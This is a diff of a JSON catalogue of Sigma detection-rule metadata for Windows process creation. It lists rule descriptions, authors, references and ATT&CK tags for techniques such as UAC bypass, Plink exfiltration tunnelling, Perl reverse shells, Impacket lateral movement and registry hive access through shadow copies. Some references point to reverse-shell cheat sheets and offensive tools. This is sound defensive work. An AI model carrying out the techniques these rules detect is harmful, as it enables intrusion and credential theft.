"proc_creation_win_uac_bypass_wmp.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "value": "UAC Bypass Using Windows Media Player - Process" + }, + { + "description": "Execution of plink to perform data exfiltration and tunneling", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/04", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_susp_plink_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_plink_usage.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1572" + ] + }, + "uuid": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "value": "Suspicious Plink Usage RDP Tunneling" + }, + { + "description": "Detects suspicious inline VBScript keywords as used by UNC2452", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_vbscript_unc2452.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_vbscript_unc2452.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ] + }, + "uuid": "20c3f09d-c53d-4e85-8b74-6aa50e2f1b61", + "value": "Suspicious VBScript UN2452 Pattern" + }, + { + "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_taidoor.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" + ], + "tags": [ + "attack.execution", + "attack.t1055.001" + ] + }, + "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", + "value": "TAIDOOR RAT DLL Load" + }, + { + "description": "Detects the exploitation of PrinterNightmare to get a shell as 
LOCAL_SYSTEM", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_exploit_systemnightmare.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/GossiTheDog/SystemNightmare", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ] + }, + "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", + "value": "SystemNightmare Exploitation Script Execution" + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_wermgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/binderlabs/DirCreate2System", + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" + ], + "tags": "No established tags" + }, + "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", + "value": "Suspicious WERMGR Process Patterns" + }, + { + "description": "Detects suspicious process related to rasdial.exe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rasdial_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://twitter.com/subTee/status/891298217907830785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "value": "Suspicious RASdial Activity" + }, + { + "description": "Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.\nThis could be a sign of obfuscation of a fat finger problem (typo by the developer).\n", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_missing_spaces.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a16980c2-0c56-4de0-9a79-17971979efdd", + "value": "Missing Space Characters in Command Lines" + }, + { + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "meta": { + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "filename": "proc_creation_win_susp_odbcconf.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/raspberry-robin/", + "https://twitter.com/Hexacorn/status/1187143326673330176", + 
"https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_odbcconf.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ] + }, + "uuid": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "value": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe" + }, + { + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mspub_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/238/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_mspub_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", + "value": "Download Arbitrary Files Via MSPUB.EXE" + }, + { + "description": "Detects usage of Dsacls to grant over permissive permissions", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Legitimate administrators granting over permissive permissions to users" + ], + "filename": "proc_creation_win_dsacls_abuse_permissions.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ss64.com/nt/dsacls.html", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml" + ], + "tags": [ + "attack.execution", + "attack.t1218" + ] + }, + "uuid": "01c42d3c-242d-4655-85b2-34f1739632f7", + "value": "Abusing Permissions Using Dsacls" + }, + { + "description": "Detects execution of perl using the \"-e\"/\"-E\" flags. This is could be used as a way to launch a reverse shell or execute live perl code.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2023/01/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_perl_inline_command_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "f426547a-e0f7-441a-b63e-854ac5bdf54d", + "value": "Perl Inline Command Execution" + }, + { + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "meta": { + "author": "frack113", + "creation_date": "2022/05/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_gpresult.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", + "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf", + "https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", + 
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_gpresult.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1615" + ] + }, + "uuid": "e56d3073-83ff-4021-90fe-c658e0709e72", + "value": "Gpresult Display Group Policy Information" + }, + { + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "meta": { + "author": "Georg Lauenstein", + "creation_date": "2022/09/19", + "falsepositive": [ + "Other programs that use the same command line flags" + ], + "filename": "proc_creation_win_winpeas_tool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", + "https://github.com/carlospolop/PEASS-ng", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" + ] + }, + "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "value": "Detect Execution of winPEAS" + }, + { + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "meta": { + "author": "Austin Songer (@austinsonger)", + "creation_date": "2021/10/21", + "falsepositive": [ + "Legitimate usage of stordiag.exe." 
+ ], + "filename": "proc_creation_win_stordiag_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", + "https://twitter.com/eral4m/status/1451112385041911809", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "value": "Execution via stordiag.exe" + }, + { + "description": "Detects wmiexec/dcomexec/atexec/smbexec from Impacket framework", + "meta": { + "author": "Ecco, oscd.community, Jonhnathan Ribeiro", + "creation_date": "2019/09/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_impacket_lateralization.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/smbexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/atexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/dcomexec.py", + "https://github.com/SecureAuthCorp/impacket/blob/8b1a99f7c715702eafe3f24851817bb64721b156/examples/wmiexec.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impacket_lateralization.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "10c14723-61c7-4c75-92ca-9af245723ad2", + "value": "Impacket Lateralization Detection" + }, + { + "description": "Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)", + "meta": { + "author": "Julia Fomina, oscd.community", + "creation_date": 
"2020/10/08", + "falsepositive": [ + "Legitimate use of Pester for writing tests for Powershell scripts and modules" + ], + "filename": "proc_creation_win_susp_pester.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/Oddvarmoe/status/993383596244258816", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pester.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "59e938ff-0d6d-4dc3-b13f-36cc28734d4e", + "value": "Execute Code with Pester.bat" + }, + { + "description": "Detects creation of a new service.", + "meta": { + "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Legitimate administrator or user creates a service for legitimate reasons." + ], + "filename": "proc_creation_win_new_service_creation.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_new_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ] + }, + "uuid": "7fe71fc9-de3b-432a-8d57-8c809efc10ab", + "value": "New Service Creation" + }, + { + "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", + "meta": { + "author": "pH-T", + "creation_date": "2022/07/15", + "falsepositive": [ + "Software installation" + ], + "filename": "proc_creation_win_schtasks_once_0000.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_once_0000.yml" + ], + "tags": "No established tags" + }, + "uuid": "970823b7-273b-460a-8afc-3a6811998529", + "value": "Uncommon Scheduled Task Once 00:00" + }, + { + "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/14", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136.001", + "cve.2021.35211" + ] + }, + "uuid": "75578840-9526-4b2a-9462-af469a45e767", + "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322" + }, + { + "description": "Detects a command that accesses password storing registry hives via volume shadow backups", + "meta": { + "author": "Max Altgelt, Tobias Michalski", + "creation_date": "2021/08/09", + "falsepositive": [ + "Some rare backup scenarios" + ], + "filename": "proc_creation_win_malware_conti_shadowcopy.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", + "https://twitter.com/vxunderground/status/1423336151860002816?s=20", + "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_conti_shadowcopy.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "f57f8d16-1f39-4dcb-a604-6c73d9b54b3d", + "value": "Sensitive Registry Access via Volume Shadow Copy" + }, + { + "description": "Detects suspicious parent process for cmd.exe", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_unusual_parent_for_cmd.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/unusual-parent-process-for-cmd.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_unusual_parent_for_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "4b991083-3d0e-44ce-8fc4-b254025d8d4b", + "value": "Unusual Parent Process for cmd.exe" + }, + { + "description": "Detects base64 encoded powershell 'Invoke-' call", + "meta": { + "author": "pH-T", + "creation_date": "2022/05/20", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_base64_invoke.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", + "value": "Suspicious Base64 Encoded Powershell Invoke" + }, + { + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. 
This can be used by threat actors to download files.", + "meta": { + "author": "Sreeman, Florian Roth", + "creation_date": "2022/01/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_headless_browser_file_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1478234484881436672?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_headless_browser_file_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", + "value": "File Download with Headless Browser" + }, + { + "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "value": "UAC Bypass Using PkgMgr and DISM" + }, + { + "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", + "meta": { + "author": "frack113", + "creation_date": "2022/12/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_runexehelper.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/", + 
"https://twitter.com/0gtweet/status/1206692239839289344", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714", + "value": "Lolbin Runexehelper Use As Proxy" + }, + { + "description": "Detects SharpLdapWhoami, a whoami alternative by asking the LDAP service on a domain controller", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/08/29", + "falsepositive": [ + "Programs that use the same command line flags" + ], + "filename": "proc_creation_win_hack_sharpldapwhoami.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bugch3ck/SharpLdapWhoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpldapwhoami.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033", + "car.2016-03-001" + ] + }, + "uuid": "d9367cbb-c2e0-47ce-bdc0-128cb6da898d", + "value": "SharpLdapWhoami" + }, + { + "description": "Detects Winword process loading custmom dlls via the '/l' switch.\nWinword can be abused as a LOLBIN to download arbitrary file or load arbitrary DLLs.\n", + "meta": { + "author": "Nasreddine Bencherchali, Victor Sergeev, oscd.community", + "creation_date": "2022/05/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_winword.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_winword.yml" + ], + "tags": [ + "attack.defense_evasion", 
+ "attack.t1202" + ] + }, + "uuid": "4ae3e30b-b03f-43aa-87e3-b622f4048eed", + "value": "Winword LOLBIN Usage" }, { "description": "Detects Trojan loader activity as used by APT28", 
@@ -34490,501 +30991,78 @@ "value": "Sofacy Trojan Loader Activity" }, { - "description": "Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM", + "description": "Detects the uninstallation of Sysinternals Sysmon, which could be the result of legitimate administration or a manipulation for defense evasion", "meta": { - "author": "MSTIC, FPT.EagleEye", - "creation_date": "2021/06/15", + "author": "frack113", + "creation_date": "2022/01/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_apt_sourgrum.yml", + "filename": "proc_creation_win_uninstall_sysmon.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection", - "https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml", - "https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_sourgrum.yml" - ], - "tags": [ - "attack.t1546", - "attack.t1546.015", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "7ba08e95-1e0b-40cd-9db5-b980555e42fd", - "value": "SOURGUM Actor Behaviours" - }, - { - "description": "Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/10/22", - "falsepositive": [ - "Renamed SysInternals tool" - ], - "filename": "proc_creation_win_apt_ta17_293a_ps.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.us-cert.gov/ncas/alerts/TA17-293A", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta17_293a_ps.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uninstall_sysmon.yml" ], "tags": [ "attack.defense_evasion", - "attack.g0035", - "attack.t1036.003", - "car.2013-05-009" + "attack.t1562.001" ] }, - "uuid": "18da1007-3f26-470f-875d-f77faf1cab31", - "value": "Ps.exe Renamed SysInternals Tool" + "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "value": "Uninstall Sysinternals Sysmon" }, { - "description": "Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents", + "description": "Deployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images", "meta": { - "author": "Florian Roth", - "creation_date": "2020/12/08", + "author": "frack113", + "creation_date": "2022/01/16", "falsepositive": [ - "Unknown" + "Legitimate script" ], - "filename": "proc_creation_win_apt_ta505_dropper.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/ForensicITGuy/status/1334734244120309760", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_ta505_dropper.yml" - ], - "tags": [ - "attack.execution", - "attack.g0092", - "attack.t1106" - ] - }, - "uuid": "18cf6cf0-39b0-4c22-9593-e244bdc9a2d4", - "value": "TA505 Dropper Load Pattern" - }, - { - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "meta": { - "author": "Florian Roth", - "creation_date": "2020/07/30", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_taidoor.yml", - "level": "high", - 
"logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-216a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_taidoor.yml" - ], - "tags": [ - "attack.execution", - "attack.t1055.001" - ] - }, - "uuid": "d1aa3382-abab-446f-96ea-4de52908210b", - "value": "TAIDOOR RAT DLL Load" - }, - { - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "meta": { - "author": "@41thexplorer, Microsoft Defender ATP", - "creation_date": "2019/11/12", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_apt_tropictrooper.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_tropictrooper.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "value": "TropicTrooper Campaign November 2018" - }, - { - "description": "Detects automated lateral movement by Turla group", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/11/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_turla_commands_critical.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_critical.yml" - ], - "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - 
"attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" - ] - }, - "uuid": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "value": "Turla Group Lateral Movement" - }, - { - "description": "Detects automated lateral movement by Turla group", - "meta": { - "author": "Markus Neis", - "creation_date": "2017/11/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "filename": "proc_creation_win_dsim_remove.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/the-epic-turla-operation/65545/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + "https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsim_remove.yml" ], "tags": [ - "attack.g0010", - "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.defense_evasion", + "attack.t1562.001" ] }, - "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", - "value": "Automated Turla Group Lateral Movement" + "uuid": "43e32da2-fdd0-4156-90de-50dfd62636f9", + "value": "Dism Remove Online Package" }, { - "description": "Detects commands used by Turla group as reported by ESET in May 2020", + "description": "Detecting DNS tunnel activity for Muddywater actor", "meta": { - "author": "Florian Roth", - "creation_date": "2020/05/26", + "author": "@caliskanfurkan_", + "creation_date": "2020/06/04", "falsepositive": [ "Unknown" ], - 
